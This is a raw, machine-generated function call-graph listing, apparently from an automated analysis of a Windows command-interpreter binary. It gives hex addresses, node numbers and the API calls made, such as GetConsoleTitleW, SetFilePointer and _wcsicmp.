ee5e61 20557->20562 20558->20559 20561 ef2b0b 20558->20561 20563 f08959 449 API calls 20559->20563 20564 ef2aa8 _wcsicmp 20560->20564 20560->20574 20567 eea62f wcschr 20561->20567 20568 f08c50 448 API calls 20562->20568 20569 ef2b81 20563->20569 20570 ef2abe _wcsicmp 20564->20570 20564->20574 20565 eedcd0 448 API calls 20565->20574 20566 eecc70 548 API calls 20566->20574 20571 ef2b1f 20567->20571 20583 ee5e68 20568->20583 20573 f08959 449 API calls 20569->20573 20590 ef2b8c 20569->20590 20570->20574 20579 ef2ad7 20570->20579 20571->20559 20576 ef2b34 20571->20576 20572 eff4d2 20575 f09922 448 API calls 20572->20575 20577 eff50f 20573->20577 20574->20555 20574->20556 20574->20565 20574->20566 20574->20572 20581 f08959 449 API calls 20574->20581 20578 eff4d7 longjmp 20575->20578 20630 ef2c23 20576->20630 20577->20577 20578->20579 20579->20556 20584 f08959 449 API calls 20579->20584 20581->20574 20582 ef2b4b 20634 ef33ca 20582->20634 20583->20433 20584->20556 20590->20433 20592 eecc70 548 API calls 20591->20592 20593 eea93b 20592->20593 20594 eea942 20593->20594 20596 f08959 449 API calls 20593->20596 20595 eedcd0 448 API calls 20594->20595 20597 eea94f 20594->20597 20595->20597 20596->20594 20598 eea959 20597->20598 20599 f09922 448 API calls 20597->20599 20598->20514 20600 ef9cac longjmp 20599->20600 20604 ee5e22 20600->20604 20601 ee5e1d 20601->20514 20602 ee5da6 448 API calls 20602->20604 20603 ee8f21 448 API calls 20603->20604 20604->20601 20604->20602 20604->20603 20605 ee5e61 20604->20605 20606 f08c50 448 API calls 20605->20606 20607 ee5e68 20606->20607 20607->20514 20609 eedcd0 448 API calls 20608->20609 20610 eebba1 20609->20610 20611 eedcd0 448 API calls 20610->20611 20614 eebbc1 20610->20614 20611->20614 20612 f09922 448 API calls 20613 ef9cac longjmp 20612->20613 20619 ee5e22 20613->20619 20614->20612 20616 eebbde 20614->20616 20615 ee5e1d 20615->20537 20616->20537 20617 ee5da6 448 API calls 20617->20619 20618 ee8f21 448 API calls 20618->20619 20619->20615 20619->20617 20619->20618 20620 ee5e61 20619->20620 20621 f08c50 448 API calls 20620->20621 20622 ee5e68 20621->20622 20622->20537 20624 eebc30 448 API calls 20623->20624 20625 ee9938 20624->20625 20654 eea800 20625->20654 20628 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20629 ee994e 20628->20629 20629->20574 20631 eecc70 548 API calls 20630->20631 20632 ef2c2f _wcsicmp 20631->20632 20633 ef2c41 20632->20633 20633->20582 20635 eecc70 548 API calls 20634->20635 20636 ef33e2 20635->20636 20637 eff776 20636->20637 20645 ef33eb 20636->20645 20638 f08959 449 API calls 20637->20638 20639 eff77b 20638->20639 20640 eecc70 548 API calls 20640->20645 20642 ef3457 20645->20639 20645->20640 20645->20642 20646 eedd20 448 API calls 20645->20646 20647 eedcd0 448 API calls 20645->20647 20648 eff78c 20645->20648 20646->20645 20647->20645 20655 ee9943 20654->20655 20656 eea82f 20654->20656 20655->20628 20656->20655 20656->20656 20657 f09a0e 449 API calls 20656->20657 20658 efc971 20657->20658 20658->20655 20659 ee63bd 448 API calls 20658->20659 20665 eed613 20664->20665 20666 eed660 532 API calls 20665->20666 20668 eed627 20665->20668 20667 ef80cd 20666->20667 20667->20451 20668->20451 20670 eedcd0 448 API calls 20669->20670 20671 eeda45 20670->20671 20672 efd948 memset longjmp 20671->20672 20686 eeda52 20671->20686 20673 eeda81 20672->20673 20673->20311 20674 eedad3 20675 efd9ad 20674->20675 20676 eedaf1 20674->20676 20679 ee78e4 448 API calls 20675->20679 20677 eedc60 2 API calls 20676->20677 20678 eedaf6 20677->20678 20678->20311 20680 efd9a8 20679->20680 20683 eedc60 2 API calls 20680->20683 20684 efd9cc longjmp 20683->20684 20685 efd9da 20684->20685 20687 ee78e4 448 API calls 20685->20687 20686->20673 20686->20674 20686->20675 20689 efd97b memcpy 20686->20689 20738 eeee03 20686->20738 20789 eebf70 20686->20789 20688 efd9e3 20687->20688 20688->20311 20690 ee78e4 448 API calls 20689->20690 20690->20680 20692 f07728 20691->20692 20693 f076fd 20691->20693 20695 f07d26 20692->20695 20698 f07746 20692->20698 20700 ee9950 448 API calls 20692->20700 20694 ee63bd 448 API calls 20693->20694 20697 f07708 EnterCriticalSection LeaveCriticalSection 20694->20697 20696 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20695->20696 20699 f07d3d 20696->20699 20697->20692 20701 eeec2e 448 API calls 20698->20701 20702 f07750 20698->20702 20699->20304 20700->20698 20701->20702 20703 ee8e9e 448 API calls 20702->20703 20704 f077ad 20703->20704 20843 f07654 20704->20843 20707 f07c99 20708 ee9abf _vsnwprintf 20707->20708 20709 f07cba 20708->20709 20711 ee998d 448 API calls 20709->20711 20710 f078b8 towupper 20719 f077fa 20710->20719 20712 f07cfe 20711->20712 20712->20695 20713 f07d07 EnterCriticalSection LeaveCriticalSection 20712->20713 20713->20695 20714 ee9310 448 API calls 20714->20719 20715 ee6854 448 API calls 20715->20719 20716 ee4d08 4 API calls 20716->20719 20717 f07afc GetDriveTypeW 20717->20719 20719->20709 20719->20710 20719->20714 20719->20715 20719->20716 20719->20717 20720 ee9abf _vsnwprintf 20719->20720 20721 ef72ef ApiSetQueryApiSetPresence 20719->20721 20723 ee9abf _vsnwprintf 20719->20723 20847 ef640a FormatMessageW 20719->20847 20722 f079ed LocalFree 20720->20722 20721->20719 20722->20719 20723->20719 20724->20310 20726 f04799 448 API calls 20725->20726 20727 f0763c 20726->20727 20728 f07649 GetLastError 20727->20728 20729 f07645 20727->20729 20728->20729 20729->20325 20731 f0a0ef GetStdHandle 20730->20731 20732 f04799 448 API calls 20731->20732 20733 f0a110 20732->20733 20734 f0a114 wcschr 20733->20734 20735 f0a129 20733->20735 20734->20731 20734->20735 20736 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20735->20736 20737 f0a133 20736->20737 20737->20368 20739 eeee4c 20738->20739 20740 eeee52 20738->20740 20739->20740 20743 eeeea7 20739->20743 20741 eeee5a wcsrchr 20740->20741 20742 eeee68 20740->20742 20741->20742 20745 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20742->20745 20746 ef1a05 5 API calls 20743->20746 20750 efde31 20743->20750 20744 efde3f 20744->20742 20748 efde49 ??_V@YAXPAX 20744->20748 20749 eeee88 20745->20749 20775 eeeed8 20746->20775 20747 efdf50 longjmp 20747->20750 20748->20742 20749->20686 20750->20744 20750->20747 20750->20748 20751 eeef09 towlower wcsrchr 20754 eef1dd wcsrchr 20751->20754 20751->20775 20752 eeef50 wcsrchr 20755 eeef67 wcsrchr 20752->20755 20752->20775 20753 efde80 wcschr 20756 efde9e 20753->20756 20757 efdf01 20753->20757 20758 eef1f7 towlower 20754->20758 20754->20775 20755->20757 20755->20775 20759 eedcd0 448 API calls 20756->20759 20757->20748 20760 ee78e4 448 API calls 20757->20760 20758->20775 20763 efdeb5 20759->20763 20760->20750 20761 eeacb0 448 API calls 20761->20775 20762 eeefed 20762->20742 20764 eeefef ??_V@YAXPAX 20762->20764 20763->20750 20812 ef1d90 20763->20812 20764->20742 20766 eeefe6 20769 eeacb0 448 API calls 20766->20769 20767 eef009 GetFullPathNameW 20767->20775 20769->20762 20770 eedc60 2 API calls 20770->20757 20771 efdf72 SearchPathW 20771->20775 20772 ef0207 10 API calls 20773 eef03d wcsrchr 20772->20773 20774 efdfb9 wcsrchr 20773->20774 20773->20775 20774->20775 20775->20748 20775->20750 20775->20751 20775->20752 20775->20753 20775->20757 20775->20761 20775->20762 20775->20766 20775->20767 20775->20771 20775->20772 20775->20774 20776 eef067 memset 20775->20776 20778 efdff6 GetFileAttributesExW 20775->20778 20779 eef18a 20775->20779 20780 efe07c FileTimeToSystemTime 20775->20780 20785 ee6854 448 API calls 20775->20785 20787 eef164 wcsrchr 20775->20787 20788 ee9310 448 API calls 20775->20788 20825 f0b325 20775->20825 20777 eee3f0 17 API calls 20776->20777 20777->20775 20778->20775 20781 eeacb0 448 API calls 20779->20781 20783 efe271 20779->20783 20780->20775 20782 eef1ba 20781->20782 20782->20762 20784 eef1c8 ??_V@YAXPAX 20782->20784 20784->20762 20785->20775 20787->20775 20787->20783 20788->20775 20790 eedcd0 448 API calls 20789->20790 20792 eebfc8 20790->20792 20791 efcfad longjmp 20796 eec02c 20791->20796 20794 eedcd0 448 API calls 20792->20794 20792->20796 20797 eec155 20792->20797 20793 efcfc1 longjmp 20793->20796 20794->20796 20795 eeec2e 448 API calls 20795->20796 20796->20791 20796->20793 20796->20795 20796->20797 20800 eec1ef wcstol 20796->20800 20801 eec111 20796->20801 20809 eec26d 20796->20809 20810 eec0bf 20796->20810 20797->20797 20802 efd042 memcpy 20797->20802 20803 eec333 memcpy 20797->20803 20806 eec1b2 _wcsnicmp 20797->20806 20797->20810 20800->20796 20801->20797 20804 efd029 20801->20804 20805 efd063 20802->20805 20803->20806 20807 ee78e4 448 API calls 20804->20807 20806->20797 20808 efd036 longjmp 20807->20808 20808->20802 20809->20797 20811 eec27d wcstol 20809->20811 20838 eec3f4 20810->20838 20811->20797 20813 ef1da8 20812->20813 20814 ef1e5a 20812->20814 20813->20814 20833 eeab7f 20813->20833 20814->20770 20817 eeacb0 448 API calls 20818 ef1dc2 20817->20818 20819 ef01f5 wcsrchr 20818->20819 20824 ef1dd1 20819->20824 20820 eff106 20821 ef1e4a 20823 eedc60 2 API calls 20821->20823 20822 ef1e11 _wcsnicmp 20822->20824 20823->20814 20824->20820 20824->20821 20824->20822 20824->20824 20828 f0b35b __aulldvrm 20825->20828 20826 f0b42e 20827 f0b445 wcsncmp 20826->20827 20830 f0b432 20826->20830 20827->20830 20828->20826 20829 f0b3f4 memmove 20828->20829 20829->20828 20831 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20830->20831 20832 f0b4f8 20831->20832 20832->20775 20836 eeabaa 20833->20836 20837 eeab88 20833->20837 20834 eeab89 iswspace 20835 eeab98 wcschr 20834->20835 20834->20837 20835->20836 20835->20837 20836->20817 20837->20834 20837->20835 20837->20836 20839 eedc60 2 API calls 20838->20839 20840 eec3fb 20839->20840 20841 eedc60 2 API calls 20840->20841 20842 eec0df 20841->20842 20842->20686 20844 f07660 20843->20844 20845 f07679 20843->20845 20846 ef6e25 4 API calls 20844->20846 20845->20695 20845->20707 20845->20719 20846->20845 20847->20719 20849 f08727 20848->20849 20854 f08781 20848->20854 20850 ee998d 448 API calls 20849->20850 20853 f08736 20850->20853 20851 ee9950 448 API calls 20851->20853 20852 ee998d 448 API calls 20852->20853 20853->20851 20853->20852 20853->20854 20856 ee9950 448 API calls 20855->20856 20857 f086f9 20856->20857 20858 f0871d 448 API calls 20857->20858 20859 f08702 20858->20859 20860 f08791 448 API calls 20859->20860 20861 f0870d 20860->20861 20862 f08791 448 API calls 20861->20862 20863 f08718 20862->20863 20863->20276 20865 eeadc6 20864->20865 20869 efcc3f 20864->20869 20866 ef5a2e memset 20865->20866 20868 eeadd1 20866->20868 20867 efcc6a GetLastError 20867->20869 20868->20869 20871 eee3f0 17 API calls 20868->20871 20869->20867 20870 ee78e4 448 API calls 20869->20870 20875 ef61e6 ??_V@YAXPAX 20869->20875 20870->20869 20872 eeadef 20871->20872 20872->20869 20873 eeb0b9 20872->20873 20874 eeae05 20872->20874 20876 ef0b12 5 API calls 20873->20876 21115 eee950 memset 20874->21115 20875->20869 20878 eeb0c1 20876->20878 20878->20869 21244 ee7f47 memset 20878->21244 20880 eeb118 21258 ef21ee 20880->21258 20881 eeae23 20881->20869 20885 efcc7c 20881->20885 20890 eeae44 20881->20890 20888 ef61e6 ??_V@YAXPAX 20885->20888 20886 eeb11f 21262 ef2940 20886->21262 20887 eeb0dc towupper 20889 eeb100 20887->20889 20908 eeaea1 20888->20908 20889->20880 20889->20889 20892 efcc75 20889->20892 20893 eebc30 448 API calls 20890->20893 20890->20908 20894 f09a7d 448 API calls 20892->20894 20895 eeae86 20893->20895 20894->20885 20897 eeae91 20895->20897 20899 eeb00e wcsncmp 20895->20899 20902 eea800 449 API calls 20897->20902 20897->20908 20899->20897 20899->20908 20900 eeaf6b 21144 eeb1b0 20900->21144 20901 ef61e6 ??_V@YAXPAX 20904 eeafe8 20901->20904 20902->20908 20907 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20904->20907 20905 eeb13b 20905->20908 20909 ef0b12 5 API calls 20905->20909 20919 eeb176 20905->20919 20924 ee7f47 23 API calls 20905->20924 20934 efccc9 GetLastError 20905->20934 20912 eeb002 20907->20912 20908->20869 20908->20900 20908->20905 20910 eeaecb wcschr 20908->20910 20908->20919 20909->20905 20910->20908 20929 eeb033 20910->20929 20911 eeaf83 20914 eeaf99 20911->20914 20915 eeafc4 20911->20915 20912->18648 20917 eeb02c 20914->20917 20918 eeafa5 20914->20918 21166 eeaa50 20915->21166 21176 eec6c0 20917->21176 20920 eeb085 20918->20920 20921 eeafb1 20918->20921 20923 ee78e4 448 API calls 20919->20923 21229 ee9dc0 20920->21229 20926 eeafbd 20921->20926 20927 eeb0a2 20921->20927 20923->20869 20924->20905 21163 ee9770 20926->21163 20927->20886 20932 eeb0aa 20927->20932 20928 eeb031 20931 eeafc2 20928->20931 20929->20920 20930 eeb193 20929->20930 20935 ef6c78 4 API calls 20930->20935 21172 eeb17b 20931->21172 21148 ee59a0 20932->21148 20934->20919 20935->20919 20939 eee683 20937->20939 20940 eee6c6 20937->20940 20938 eee689 22109 eee790 20938->22109 20939->20938 20939->20940 20943 eee71d 20939->20943 20944 eee6ec 20939->20944 20949 eee733 20939->20949 20940->18618 20948 eee790 457 API calls 20943->20948 20944->20940 20947 eee790 457 API calls 20944->20947 20945 eee790 457 API calls 20950 eee6ad 20945->20950 20946 eee790 457 API calls 20946->20940 20947->20944 20948->20949 20949->20940 20949->20946 20950->20940 20951 eee790 457 API calls 20950->20951 20951->20950 20954 ef03cb 20952->20954 20953 ef03e1 20955 ef0416 20953->20955 20956 ef03f3 20953->20956 20954->20953 20957 efe7bf iswdigit 20954->20957 20962 ef03f8 20955->20962 22127 ef2960 wcstol wcstol 20955->22127 22123 ef15f0 20956->22123 20957->20954 20959 efe7e2 20957->20959 20961 ee78e4 448 API calls 20959->20961 20963 ef040d 20961->20963 20964 eee470 916 API calls 20962->20964 20963->18648 20964->20963 20966 eee470 917 API calls 20965->20966 20967 eeab63 20966->20967 20968 eeab76 20967->20968 20969 eee470 917 API calls 20967->20969 20968->18648 20969->20968 20971 eee3f0 17 API calls 20970->20971 20983 ee9f61 20971->20983 20972 eea0d9 20974 eea0ef 20972->20974 20975 eea0e7 ??_V@YAXPAX 20972->20975 20973 ee9fd7 20977 eedcd0 448 API calls 20973->20977 21002 ee9ff4 20973->21002 20976 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20974->20976 20975->20974 20978 eea0fe 20976->20978 20977->21002 20978->18622 20978->18636 20979 ef0060 5 API calls 20979->20983 20981 efc376 _get_osfhandle SetFilePointer 20984 efc392 20981->20984 20981->21002 20982 eea02b _get_osfhandle 20986 eea03d _get_osfhandle 20982->20986 20982->21002 20983->20972 20983->20973 20983->20979 20987 ee9abf _vsnwprintf 20984->20987 20986->21002 20988 efc3a9 20987->20988 20993 ee78e4 448 API calls 20988->20993 20989 efc439 20990 ee9abf _vsnwprintf 20989->20990 20990->20988 20991 eedd98 6 API calls 20991->21002 20992 eea16c _close 20992->21002 20994 efc463 20993->20994 20997 eea125 2 API calls 20994->20997 20995 eea1d6 _dup2 20995->21002 20996 efc3d3 20999 ef1d90 451 API calls 20996->20999 20997->20972 20998 ef0590 19 API calls 20998->21002 21003 efc3dd 20999->21003 21000 efc40c 21005 eea1d6 _dup2 21000->21005 21001 eea11c 21012 eea125 2 API calls 21001->21012 21002->20972 21002->20981 21002->20982 21002->20989 21002->20991 21002->20992 21002->20995 21002->20996 21002->20998 21002->21000 21002->21001 21004 efc4aa 21002->21004 22132 eea1a8 _dup 21002->22132 22134 f09fcf _get_osfhandle GetFileType 21002->22134 21003->21004 21010 efc3f2 SearchPathW 21003->21010 21006 eea125 2 API calls 21004->21006 21007 efc42d 21005->21007 21011 efc4af 21006->21011 21008 efc475 21007->21008 21009 efc434 21007->21009 21016 eea16c _close 21008->21016 21014 eea16c _close 21009->21014 21010->21000 21010->21004 21015 f09edb 448 API calls 21011->21015 21013 efc47f 21012->21013 21017 ee9abf _vsnwprintf 21013->21017 21014->20989 21015->20972 21016->21001 21018 efc496 21017->21018 21019 ee78e4 448 API calls 21018->21019 21019->20972 21021 eee470 917 API calls 21020->21021 21022 ef03a2 21021->21022 21022->18648 21024 eedcd0 448 API calls 21023->21024 21025 ef0776 21024->21025 21026 efe9b9 21025->21026 21027 ef089d 21025->21027 21028 ef0792 21025->21028 21029 eedcd0 448 API calls 21027->21029 21032 eedd20 448 API calls 21028->21032 21030 ef08a5 21029->21030 21031 eedcd0 448 API calls 21030->21031 21039 ef07de 21031->21039 21033 ef07b3 21032->21033 21034 efe8bd 21033->21034 21035 ef07bb 21033->21035 21036 eedc60 2 API calls 21034->21036 21037 eedd20 448 API calls 21035->21037 21038 ef07d6 21036->21038 21037->21038 21038->21039 21042 eedc60 2 API calls 21038->21042 21039->21026 21040 ef08c5 21039->21040 21041 ef0812 21039->21041 21043 eebc30 448 API calls 21040->21043 21044 ef0818 21041->21044 21045 ef0875 21041->21045 21042->21039 21047 ef08d2 wcstol 21043->21047 22135 ef0bf0 21044->22135 21048 ef087f 21045->21048 21049 efe8e7 21045->21049 22250 eea7d5 21047->22250 21051 eebc30 448 API calls 21048->21051 21054 ef0060 5 API calls 21049->21054 21053 ef088c 21051->21053 21052 ef08ec wcstol 21056 eea7d5 21052->21056 22199 ee6e57 21053->22199 21055 efe8fd GetFullPathNameW 21054->21055 21063 efe915 21055->21063 21058 ef0906 wcstol 21056->21058 21070 ef0922 21058->21070 21059 eedcd0 448 API calls 21059->21063 21060 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21064 ef0871 21060->21064 21061 ef0822 21061->21026 21061->21060 21062 ee78e4 448 API calls 21062->21063 21063->21059 21063->21062 21065 efe942 GetFullPathNameW 21063->21065 21068 efe95d 21063->21068 21064->18648 21065->21063 21066 f098b5 453 API calls 21066->21070 21067 ee9abf _vsnwprintf 21067->21070 21069 eebc30 448 API calls 21068->21069 21071 efe99d 21069->21071 21070->21049 21070->21066 21070->21067 21074 ef198f 3 API calls 21070->21074 22252 ef0bbb 21070->22252 22261 f03e66 21071->22261 21074->21070 21077 eeeda4 21075->21077 21078 eee5d8 21075->21078 21076 eeedb7 _wcsicmp 21076->21077 21076->21078 21077->21076 21077->21078 21078->18635 21078->18649 21080 ef2090 21079->21080 21081 eedcd0 448 API calls 21080->21081 21082 ef20a9 21081->21082 21083 eeb1b0 448 API calls 21082->21083 21107 eee613 21082->21107 21084 ef20ba 21083->21084 21085 eef410 464 API calls 21084->21085 21084->21107 21086 ef20d2 21085->21086 21087 ef212f 21086->21087 21088 ef20d9 GetConsoleTitleW 21086->21088 21090 ef217a 21087->21090 21091 ef2134 GetConsoleTitleW 21087->21091 21089 eead26 450 API calls 21088->21089 21094 ef20f2 21089->21094 21093 eff23f 21090->21093 21096 ef2183 21090->21096 21092 eead26 450 API calls 21091->21092 21095 ef214d 21092->21095 21098 ee8bc7 448 API calls 21093->21098 22315 ee9458 21094->22315 21099 ef1a47 915 API calls 21095->21099 21100 ef219f 21096->21100 21101 eff24d 21096->21101 21096->21107 21098->21107 21104 ef2164 21099->21104 21105 ee78e4 448 API calls 21100->21105 21103 ee78e4 448 API calls 21101->21103 21102 ef2107 22374 ef21b5 21102->22374 21103->21107 22377 ef21c1 21104->22377 21105->21107 21107->18648 21110 ef5807 21109->21110 21114 ef5833 21109->21114 21111 ef5813 _setjmp3 21110->21111 21112 ef5825 21111->21112 21111->21114 22478 ef56c4 21112->22478 21114->18646 21116 eee9b2 21115->21116 21126 eeea65 21115->21126 21117 eee3f0 17 API calls 21116->21117 21124 eee9c3 21117->21124 21118 eeea3d 21120 eeec1e 21118->21120 21121 eeebf0 GetFileAttributesW 21118->21121 21118->21126 21119 eee9f6 wcschr 21119->21118 21119->21124 21120->21121 21123 eeebfc 21121->21123 21122 eeea0e wcschr 21122->21124 21123->21126 21124->21118 21124->21119 21124->21122 21124->21126 21139 eeeb41 21124->21139 21125 eeea7e _wcsicmp 21125->21126 21126->21125 21134 eeea99 21126->21134 21127 eeeb7e iswspace 21128 eeeac3 21127->21128 21127->21139 21130 eeeaf7 21128->21130 21131 efdd3f 21128->21131 21129 eea62f wcschr 21129->21139 21132 eeeb0f 21130->21132 21133 eeeb05 ??_V@YAXPAX 21130->21133 21137 eedcd0 448 API calls 21131->21137 21135 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21132->21135 21133->21132 21134->21128 21134->21131 21136 eeed90 _wcsicmp 21134->21136 21138 eeae12 21135->21138 21136->21139 21140 efdd80 21137->21140 21138->20880 21138->20881 21139->21127 21139->21128 21139->21129 21139->21131 21141 f09922 448 API calls 21140->21141 21143 efdd9e 21140->21143 21142 efdd91 longjmp 21141->21142 21142->21143 21145 eeb1c9 21144->21145 21146 eedcd0 448 API calls 21145->21146 21147 eeaf78 21146->21147 21147->20911 21151 eead26 21147->21151 21265 ee5ea3 memset 21148->21265 21152 eead40 21151->21152 21153 eead37 21151->21153 21152->20911 21153->21152 21154 eedcd0 448 API calls 21153->21154 21155 efcb7b 21154->21155 21155->21152 21156 efcb85 GetConsoleTitleW 21155->21156 21156->21152 21157 efcb9b 21156->21157 21158 eedd20 448 API calls 21157->21158 21162 efcbcd 21158->21162 21159 efcc33 21160 eedc60 2 API calls 21159->21160 21160->21152 21161 efcc2c SetConsoleTitleW 21161->21159 21162->21159 21162->21161 21331 ee9cc0 21163->21331 21167 efc9eb 21166->21167 21168 eeaa66 21166->21168 21170 eeaa75 489 API calls 21167->21170 21538 eeaa75 21168->21538 21171 eeaa6b 21170->21171 21171->20931 21171->21171 21173 eeafdd 21172->21173 21174 eeb185 21172->21174 21173->20901 21174->21173 21175 efccfa SetConsoleTitleW 21174->21175 21175->21173 21177 eec709 21176->21177 21178 eec7ae 21176->21178 21177->21178 21718 eeb3c1 21177->21718 21180 ef1cb1 450 API calls 21178->21180 21182 f098b5 453 API calls 21178->21182 21184 ee78e4 448 API calls 21178->21184 21188 f04191 448 API calls 21178->21188 21192 eec8b3 _get_osfhandle SetFilePointer 21178->21192 21193 eec8da _get_osfhandle GetFileType 21178->21193 21194 eec799 21178->21194 21197 eecaa2 21178->21197 21199 efd162 memcmp 21178->21199 21207 eec808 MultiByteToWideChar 21178->21207 21208 ef6c78 4 API calls 21178->21208 21210 eec7b8 SetFilePointer 21178->21210 21211 efd1ce AcquireSRWLockShared ReadFile ReleaseSRWLockShared 21178->21211 21213 eec86f wcschr 21178->21213 21214 eeca03 iswspace 21178->21214 21215 eeca1e wcschr 21178->21215 21216 eecaeb wcschr 21178->21216 21217 eeca49 wcschr 21178->21217 21218 efd2b3 _get_osfhandle SetFilePointer 21178->21218 21219 eecb10 iswspace 21178->21219 21220 eecb25 wcschr 21178->21220 21221 efd322 _get_osfhandle SetFilePointer 21178->21221 21222 efd302 WideCharToMultiByte 21178->21222 21223 eecb50 iswspace 21178->21223 21224 eecb80 wcschr 21178->21224 21225 eecb65 wcschr 21178->21225 21226 eecbc9 _wcsicmp 21178->21226 21228 efd3d3 WideCharToMultiByte 21178->21228 21180->21178 21182->21178 21183 eee272 453 API calls 21185 eec732 21183->21185 21184->21178 21185->21178 21186 eec743 _get_osfhandle GetFileSize 21185->21186 21188->21178 21192->21178 21192->21193 21193->21178 21196 eec901 SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 21193->21196 21198 eea16c _close 21194->21198 21196->21178 21201 efd3fc 21197->21201 21204 eecabd _get_osfhandle SetFilePointer 21197->21204 21200 eeca81 21198->21200 21199->21178 21202 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21200->21202 21203 ef1cb1 450 API calls 21201->21203 21205 eeca90 21202->21205 21206 efd409 21203->21206 21204->20928 21205->20928 21209 ee78e4 448 API calls 21206->21209 21207->21178 21208->21178 21212 efd427 21209->21212 21210->21178 21211->21178 21213->21178 21214->21178 21214->21215 21215->21178 21216->21178 21216->21218 21217->21178 21218->21178 21218->21219 21219->21178 21219->21220 21220->21178 21221->21178 21222->21221 21223->21178 21223->21225 21224->21226 21227 eecb96 wcschr 21224->21227 21225->21178 21226->21178 21227->21178 21227->21226 21228->21178 21727 ee9e09 21229->21727 21232 efc2b9 21235 ee63bd 448 API calls 21232->21235 21233 ee9de1 21234 ee9df7 21233->21234 21237 ee9950 448 API calls 21233->21237 21234->20931 21236 efc2d1 21235->21236 21236->21234 21741 f09fcf _get_osfhandle GetFileType 21236->21741 21237->21234 21239 efc2e5 21240 eedd98 6 API calls 21239->21240 21241 efc2e9 21239->21241 21240->21241 21241->21234 21242 ee78e4 448 API calls 21241->21242 21243 efc316 21242->21243 21243->21243 21245 eee3f0 17 API calls 21244->21245 21246 ee7fa0 21245->21246 21247 ee7fa4 GetDriveTypeW 21246->21247 21248 ee8001 21246->21248 21251 efb033 21247->21251 21254 ee7fcf 21247->21254 21249 ee800b ??_V@YAXPAX 21248->21249 21250 ee8013 21248->21250 21249->21250 21253 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21250->21253 21251->21250 21252 efb05a ??_V@YAXPAX 21251->21252 21252->21250 21256 ee8022 21253->21256 21254->21248 21255 ee7fe0 GetVolumeInformationW 21254->21255 21255->21248 21257 efb040 GetLastError 21255->21257 21256->20867 21256->20887 21257->21248 21257->21251 21260 ef2200 21258->21260 21259 ef2229 21259->20886 21260->21259 21261 ef2081 917 API calls 21260->21261 21261->21259 21742 ef26dc memset 21262->21742 21266 eee3f0 17 API calls 21265->21266 21267 ee5f21 21266->21267 21268 ef9d02 21267->21268 21269 ef9d0f 21267->21269 21271 ee8e9e 448 API calls 21267->21271 21270 ee78e4 448 API calls 21268->21270 21269->21268 21273 ef9d1f 21269->21273 21277 ef9d26 21270->21277 21272 ee5f45 21271->21272 21274 eebc30 448 API calls 21272->21274 21276 ef0060 5 API calls 21273->21276 21276->21277 21332 ee9cd3 21331->21332 21359 ee9780 21331->21359 21333 eedcd0 448 API calls 21332->21333 21334 ee9cdd 21333->21334 21335 eea62f wcschr 21334->21335 21334->21359 21336 ee9cf4 21335->21336 21337 ee9cfe 21336->21337 21338 efc17e 21336->21338 21359->20931 21539 efca49 21538->21539 21542 eeaa90 21538->21542 21540 eebc30 448 API calls 21539->21540 21543 efca70 21539->21543 21632 f05166 21539->21632 21540->21539 21542->21539 21544 eeaacb _wcsnicmp 21542->21544 21551 efcad1 21543->21551 21562 ef0060 5 API calls 21543->21562 21545 eeaadf _wcsnicmp 21544->21545 21546 eeab3d 21544->21546 21548 efc9fd 21545->21548 21559 eeaaf7 21545->21559 21563 ef3326 21546->21563 21595 f053aa 21548->21595 21552 ee78e4 448 API calls 21551->21552 21555 efcb08 21552->21555 21553 eeab0f 21553->21551 21556 eeab1b wcschr 21553->21556 21554 efca2d wcsrchr 21554->21553 21557 eeab29 21556->21557 21558 eeab47 21556->21558 21559->21551 21559->21553 21559->21554 21562->21551 21564 ef333b 21563->21564 21573 ef33ab 21563->21573 21567 ef0060 5 API calls 21564->21567 21564->21573 21565 ee78e4 448 API calls 21566 eff76c 21565->21566 21568 ef3349 21567->21568 21639 ef2dc2 21568->21639 21573->21565 21596 eeacb0 448 API calls 21595->21596 21597 f053d5 21596->21597 21633 f0516f 21632->21633 21636 f05190 21632->21636 21717 ef727b __iob_func 21633->21717 21635 f05180 fprintf 21635->21539 21637 f051dd 21636->21637 21638 ee9950 448 API calls 21636->21638 21637->21539 21638->21636 21717->21635 21719 eeab7f 2 API calls 21718->21719 21720 eeb3d3 21719->21720 21721 eeab7f 2 API calls 21720->21721 21722 eeb3eb 21720->21722 21721->21722 21723 eeb408 wcschr 21722->21723 21724 eeb3f6 wcschr 21722->21724 21725 eeb440 21722->21725 21726 eea62f wcschr 21722->21726 21723->21722 21723->21725 21724->21723 21724->21725 21725->21183 21726->21722 21728 ee9e14 21727->21728 21739 ee9dd5 21727->21739 21729 ee9e8e iswspace 21728->21729 21731 ee9e19 21729->21731 21730 ee9e27 iswspace 21730->21731 21732 ee9e40 21730->21732 21731->21730 21731->21732 21731->21739 21733 ee9e8e iswspace 21732->21733 21734 ee9e47 21733->21734 21735 efc31b _wcsnicmp 21734->21735 21736 ee9e62 21734->21736 21734->21739 21738 ee9e67 21735->21738 21735->21739 21737 ee9e71 _wcsnicmp 21736->21737 21736->21738 21737->21738 21737->21739 21738->21739 21740 ee78e4 448 API calls 21738->21740 21739->21232 21739->21233 21740->21739 21741->21239 21743 eee3f0 17 API calls 21742->21743 21744 ef27be 21743->21744 21745 ef28f8 21744->21745 21746 ef27c8 memset GetEnvironmentVariableW 21744->21746 21747 ef290a ??_V@YAXPAX 21745->21747 21748 ef2912 21745->21748 21749 eee3f0 17 API calls 21746->21749 21747->21748 21750 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21748->21750 21753 ef2830 21749->21753 21751 ef2925 21750->21751 21751->20931 21752 ef284a GetEnvironmentVariableW 21755 ef2865 21752->21755 21756 eff3b2 21752->21756 21753->21752 21768 ef28e2 